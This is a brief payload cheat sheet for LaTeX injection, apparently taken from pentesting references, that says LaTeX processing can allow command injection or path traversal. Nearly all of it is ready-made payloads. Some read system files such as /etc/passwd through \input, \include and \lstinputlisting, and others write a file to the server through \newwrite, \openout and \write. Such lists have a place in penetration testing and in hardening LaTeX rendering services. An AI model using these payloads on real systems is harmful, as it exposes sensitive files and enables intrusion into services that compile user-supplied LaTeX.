LaTeX Injection

LaTeX is a software system for document preparation. It may be vulnerable to arbitrary command injection or path traversal.

- [LaTeX Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LaTeX Injection)
- [formula-doc-latex-injection](https://book.hacktricks.xyz/pentesting-web/formula-doc-latex-injection#latex-injection)

Payloads - Read Files

# Read file
\input{/etc/passwd}
$\input{/etc/passwd}$
$$\input{/etc/passwd}$$

\include{example} # Read example.tex
$\include{example}$
$$\include{example}$$

\lstinputlisting{/etc/passwd}
$\lstinputlisting{/etc/passwd}$
$$\lstinputlisting{/etc/passwd}$$

Payloads - Write File

\newwrite\outfile
$\newwrite\outfile$
$$\newwrite\outfile$$

\openout\outfile=cmd.tex
$\openout\outfile=cmd.tex$
$$\openout\outfile=cmd.tex$$

\write\outfile{Hello-World}
$\write\outfile{Hello-World}$
$$\write\outfile{Hello-World}$$